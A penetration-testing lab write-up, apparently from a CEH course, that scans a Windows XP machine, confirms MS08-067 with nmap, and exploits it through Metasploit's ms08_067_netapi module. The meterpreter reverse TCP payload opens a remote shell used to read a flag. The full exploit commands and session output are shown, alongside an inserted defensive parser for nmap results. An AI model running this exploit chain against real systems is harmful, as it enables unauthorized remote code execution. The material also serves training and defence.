Another machine available during the CEH course, but this one was pretty straightforward.
Description: This is what happens when you run an outdated operating system that the vendor no longer supports.
The description of this machine tells us the OS is no longer up to date and vendor support is over, so let's look for active services:
root@parrot:~# nmap -sV -O 192.168.10.103
Nmap scan report for 192.168.10.103
Host is up (0.015s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows XP microsoft-ds
3389/tcp open  ms-wbt-server Microsoft Terminal Service
Network Distance: 2 hops
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Good, SMB is active, and since it is one of the primary attack vectors that is where we'll put our effort. nmap used to have a single script that checked several vulnerabilities at once, smb-check-vulns, but it was split into six separate scripts, so we'll need to run them one by one.
Looking for the nmap scripts.
root@parrot:~# locate *.nse | grep smb
/usr/share/nmap/scripts/smb-brute.nse
/usr/share/nmap/scripts/smb-double-pulsar-backdoor.nse
/usr/share/nmap/scripts/smb-enum-domains.nse
/usr/share/nmap/scripts/smb-enum-groups.nse
/usr/share/nmap/scripts/smb-enum-processes.nse
/usr/share/nmap/scripts/smb-enum-sessions.nse
/usr/share/nmap/scripts/smb-enum-shares.nse
/usr/share/nmap/scripts/smb-enum-users.nse
/usr/share/nmap/scripts/smb-flood.nse
/usr/share/nmap/scripts/smb-ls.nse
/usr/share/nmap/scripts/smb-mbenum.nse
/usr/share/nmap/scripts/smb-os-discovery.nse
/usr/share/nmap/scripts/smb-print-text.nse
/usr/share/nmap/scripts/smb-protocols.nse
/usr/share/nmap/scripts/smb-psexec.nse
/usr/share/nmap/scripts/smb-security-mode.nse
/usr/share/nmap/scripts/smb-server-stats.nse
/usr/share/nmap/scripts/smb-system-info.nse
/usr/share/nmap/scripts/smb-vuln-conficker.nse
/usr/share/nmap/scripts/smb-vuln-cve-2017-7494.nse
/usr/share/nmap/scripts/smb-vuln-cve2009-3103.nse
/usr/share/nmap/scripts/smb-vuln-ms06-025.nse
/usr/share/nmap/scripts/smb-vuln-ms07-029.nse
/usr/share/nmap/scripts/smb-vuln-ms08-067.nse
/usr/share/nmap/scripts/smb-vuln-ms10-054.nse
/usr/share/nmap/scripts/smb-vuln-ms10-061.nse
/usr/share/nmap/scripts/smb-vuln-ms17-010.nse
/usr/share/nmap/scripts/smb-vuln-regsvc-dos.nse
/usr/share/nmap/scripts/smb2-capabilities.nse
/usr/share/nmap/scripts/smb2-security-mode.nse
/usr/share/nmap/scripts/smb2-time.nse
/usr/share/nmap/scripts/smb2-vuln-uptime.nse
After a few tries I found one with a good chance of working.
root@parrot:~# nmap -sV -O 192.168.10.103 --script smb-vuln-ms08-067.nse
Host script results:
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
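From the defending side, output like this is a patch list, not a target list. The following is an added example (not part of the original writeup) that parses nmap's smb-vuln-* host-script blocks and reports which hosts nmap rated VULNERABLE or LIKELY VULNERABLE, with the CVEs to remediate; the sample output is constructed, its MS08-067 block mirroring the result above and the ms10-054 block being made up.

```python
import re

# Constructed sample modelled on nmap's smb-vuln-* host-script layout: the
# MS08-067 block mirrors the writeup's result, the ms10-054 block is made up.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.168.10.103
Host script results:
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
| smb-vuln-ms10-054:
|_    State: NOT VULNERABLE
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
SCRIPT_RE = re.compile(r"^(smb-vuln-[\w-]+):")
STATE_RE = re.compile(r"^State:\s*(.+?)\s*$")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")

def parse_smb_vuln(output):
    """Return [{host, script, state, cves}] for every smb-vuln-* result."""
    findings, host, cur = [], None, None
    for raw in output.splitlines():
        m = HOST_RE.match(raw)
        if m:
            host, cur = m.group(1), None
            continue
        if not raw.startswith("|"):
            continue                      # only NSE script lines carry the gutter
        line = raw.lstrip("|_").strip()   # strip nmap's "| " / "|_" prefix
        m = SCRIPT_RE.match(line)
        if m:
            cur = {"host": host, "script": m.group(1), "state": "UNKNOWN", "cves": []}
            findings.append(cur)
        elif cur is not None:
            m = STATE_RE.match(line)
            if m:
                cur["state"] = m.group(1)
            elif line.startswith("IDs:"):
                cur["cves"] += CVE_RE.findall(line)
    return findings

def hosts_needing_remediation(findings):
    """host -> CVEs (or script name) for states rated VULNERABLE / LIKELY VULNERABLE."""
    todo = {}
    for f in findings:
        if "VULNERABLE" in f["state"] and not f["state"].startswith("NOT"):
            todo.setdefault(f["host"], []).extend(f["cves"] or [f["script"]])
    return todo
```

Feed it the saved normal output of a scan run with several smb-vuln-* scripts and the result is the set of hosts that must be patched or isolated, keyed by CVE.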
We are going to use Metasploit for this one:
root@parrot:~# service postgresql start
root@parrot:~# msfconsole
Now we’ll search for the exploit, set the desired payload and set the options for the exploit:
msf > search MS08-067

Name                                 Disclosure Date  Rank   Description
----                                 ---------------  ----   -----------
exploit/windows/smb/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service Relative Path Stack Corruption

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.10.103
RHOST => 192.168.10.103
msf exploit(windows/smb/ms08_067_netapi) > set RPORT 445
RPORT => 445
msf exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.200.2
LHOST => 192.168.200.2
It's time to pull the trigger (senta o dedo):
msf exploit(windows/smb/ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 192.168.200.2:4444
[*] 192.168.10.103:445 - Automatically detecting the target...
[*] 192.168.10.103:445 - Fingerprint: Windows XP - Service Pack 2 - lang:Unknown
[*] 192.168.10.103:445 - We could not detect the language pack, defaulting to English
[*] 192.168.10.103:445 - Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] 192.168.10.103:445 - Attempting to trigger the vulnerability...
[*] Sending stage (179779 bytes) to 192.168.10.103
[*] Meterpreter session 2 opened (192.168.200.2:4444 -> 192.168.10.103:1030) at 2018-03-27 09:54:59 -0300

meterpreter > shell
Process 876 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>type c:\flag.txt
ch4mp10n5-n3v3r-g1v3-up!
As soon as the session opened we invoked a shell and read the flag, which we already knew where to find. The machine is wide open, letting us do anything we want. We're done here.